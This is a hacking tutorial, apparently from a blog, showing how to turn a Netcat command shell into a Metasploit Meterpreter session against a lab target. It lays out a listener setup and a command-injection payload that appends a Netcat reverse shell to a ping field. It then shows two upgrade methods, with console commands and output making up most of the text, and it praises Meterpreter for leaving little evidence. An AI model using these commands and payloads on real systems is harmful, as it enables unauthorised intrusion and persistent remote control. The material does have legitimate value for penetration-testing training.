Popping a shell is often the main goal of a hacker, and it can be exciting when executed properly, but sometimes they do have their limitations. Metasploit's Meterpreter probably needs no introduction, but this powerful, dynamic payload can offer a leg up over normal shells. To prove it, we'll show how to take a normal command shell and elevate it to a Meterpreter session.
A shell is basically an interface that acts as a shortcut to the commands of an operating system. When it comes to hacking, there are two types of shells that are mainly talked about: bind shells and reverse shells.
A bind shell effectively binds itself to a certain port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, actively connects from the target machine to the attacking machine, where a listener is waiting for incoming connections.
Command shells provide a great way to really dig into the target, but they are not always the best option. Usually, they are constrained to the privileges of the user who initiated the shell, so the power that comes with root-level access isn't always available.
Meterpreter allows us to run post-exploitation modules and privilege escalation exploits locally on the target. It utilizes encrypted communication methods and nothing is written to disk during operation, making it a suitable weapon that leaves little to no evidence behind. Meterpreter offers a ton of other features and is highly extensible, which makes it an excellent addition to any hacker's arsenal.
To get started, fire up Metasploit. Type msfconsole in the terminal and we'll be greeted by a nice little welcome banner after it loads. We'll be using a great feature of Metasploit, which is the ability to set up a universal listener that can handle a wide range of different types of shells. Enter the following to load the module:
Next, we need to specify the listening host and port, using the IP address of our local machine and an arbitrary port number. We also need to set the payload — the versatile reverse TCP shell is an excellent choice here.
msf5 exploit(multi/handler) > set lhost 172.16.1.100 lhost => 172.16.1.100 msf5 exploit(multi/handler) > set lport 1234 lport => 1234 msf5 exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcp
Type options at the prompt to verify that our settings are correct.
msf5 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.1.100 yes The listen address (an interface may be specified) LPORT 1234 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target
It looks like we're good to go. Type run to launch the handler, and it's now ready and waiting for an incoming connection.
msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.1.100:1234
Netcat is a powerful networking utility commonly used to troubleshoot connectivity issues, but it can also be utilized as a backdoor via command shells. We can use this tool, coupled with a command injection vulnerability, to spawn a shell and connect back to our local machine. If all goes well, the handler that we set up earlier will catch the shell and we'll be able to issue commands.
This vulnerability lets us append system commands to the input for the ping utility.
127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh
Here, we've tacked on the Netcat command to spawn a shell and connect to our local machine on port 1234:
After a moment, back in the terminal with our handler, we see that a session is opened up. We can now issue commands like id and uname -a to verify this.
[*] Sending stage (36 bytes) to 172.16.1.102 [*] Command shell session 1 opened (172.16.1.100:1234 -> 172.16.1.102:53462) at 2019-01-29 15:28:28 -0600 id uid=33(www-data) gid=33(www-data) groups=33(www-data) uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Finally, we need to background this session by pressing Ctrl-Z, followed by Y to confirm.
^Z Background session 1? [y/N] y msf5 exploit(multi/handler) >
Now that we have attained a session on the target, we can upgrade that humble shell to a full-fledged Meterpreter session. This will allow for greater flexibility when it comes to interacting with the target.
In order to view any sessions that are currently open, type sessions at the prompt. Below, we can see the session we opened earlier, along with its ID, shell type, and connection information.
msf5 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
The easiest way to transform a regular session into a Meterpreter session is to use the -u flag. Issue the sessions command with the appropriate ID and watch the magic happen.
msf5 exploit(multi/handler) > sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s):  [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 172.16.1.100:4433 [*] Sending stage (914728 bytes) to 172.16.1.102 [*] Meterpreter session 2 opened (172.16.1.100:4433 -> 172.16.1.102:42790) at 2019-01-29 15:30:28 -0600 [*] Command stager progress: 100.00% (773/773 bytes)
Now it seems like nothing really happened, but in fact, we've opened a Meterpreter session in the background — it doesn't automatically drop us into it. If we issue the sessions command again, it will list our new Meterpreter session with an ID of 2. We can then use the -i flag to interact with it.
msf5 exploit(multi/handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter >
And now we have a Meterpreter shell. However, there is one other way to elevate a normal shell to a Meterpreter session that is similar to the method outlined above, and that is to manually use the shell_to_meterpreter post-exploitation module.
To load it, type the following.
All we have to do is specify the existing session we want to upgrade. After that, just to be sure, we can view the current settings with the options command.
msf5 post(multi/manage/shell_to_meterpreter) > set session 1 session => 1 msf5 post(multi/manage/shell_to_meterpreter) > options Module options (post/multi/manage/shell_to_meterpreter): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER true yes Start an exploit/multi/handler to receive the connection LHOST no IP of host that will receive the connection from the payload (Will try to auto detect). LPORT 4433 yes Port for payload to connect to. SESSION 1 yes The session to run this module on.
Type run to kick it off.
msf5 post(multi/manage/shell_to_meterpreter) > run [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 172.16.1.100:4433 [*] Sending stage (914728 bytes) to 172.16.1.102 [*] Meterpreter session 3 opened (172.16.1.100:4433 -> 172.16.1.102:59832) at 2019-01-29 15:34:16 -0600 [*] Command stager progress: 100.00% (773/773 bytes) [*] Post module execution completed
Again, this opens up the new session in the background, so we have to issue the sessions command to determine the correct ID.
msf5 post(multi/manage/shell_to_meterpreter) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102) 3 meterpreter x86/linux 172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102)
We can see that this new Meterpreter session has an ID of 3. Now we are ready to interact with it.
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 3 [*] Starting interaction with 3... meterpreter >
We now have a Meterpreter shell, and from here, the sky is the limit.
In this tutorial, we learned how to take a regular old command shell and elevate it to Meterpreter status. We used a Netcat shell here, but any other type of shell should work with this method. Meterpreter offers a great deal of power and control over any target, so get out there and keep hacking away.